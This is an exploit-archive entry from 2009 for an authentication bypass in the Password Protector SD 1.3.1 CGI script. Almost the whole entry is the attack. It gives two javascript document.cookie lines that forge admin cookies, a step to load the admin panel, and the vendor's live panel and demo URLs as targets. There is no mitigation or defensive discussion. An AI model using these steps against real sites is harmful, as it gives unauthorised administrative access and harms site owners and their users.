id: 5161
date: 05/12/2009
title: Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability
author: Mr.tro0oqy
cves: 

==================================================================
Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability
==================================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability

[+] Found by : Mr.tro0oqy  
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";

step 2 [add]: javascript:document.cookie="cookname=admin;path=/";

step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home


in control panel : 

http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home


demo:
-----
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl

=======================================================



#  0day.today [2023-03-23]  #